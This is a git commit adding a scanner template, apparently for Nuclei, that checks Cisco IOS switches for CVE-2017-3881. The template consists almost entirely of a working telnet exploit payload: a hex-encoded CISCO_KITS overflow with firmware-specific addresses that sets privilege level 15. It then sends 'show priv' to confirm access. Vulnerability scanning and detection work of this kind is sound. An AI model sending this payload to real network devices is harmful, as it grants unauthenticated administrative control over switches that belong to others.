Merge pull request #920 from dwisiswant0/add/cves/2017/CVE-2017-3881

Add CVE-2017-3881
2021-03-15 00:18:48 +05:30 · 2021-03-15 00:18:48 +05:30 · e728a9acde
parent c5cccefab2 a80bee81c9
commit e728a9acde
1 changed files with 26 additions and 0 deletions
--- a/cves/2017/CVE-2017-3881.yaml
+++ b/cves/2017/CVE-2017-3881.yaml
@ -0,0 +1,26 @@
+id: CVE-2017-3881
+
+info:
+  name: Cisco IOS 12.2(55)SE11 Remote Code Execution
+  author: dwisiswant0
+  severity: critical
+  reference: |
+    - https://github.com/artkond/cisco-rce
+    - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
+    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
+  description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
+  tags: cve,cve2017,cisco,rce,network
+
+network:
+  - inputs:
+      - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
+        read: 1024
+      - data: "show priv"
+        read: 1024
+    host:
+      - "{{Hostname}}:23"
+    read-size: 1024
+    matchers:
+      - type: word
+        words:
+          - "Current privilege level is"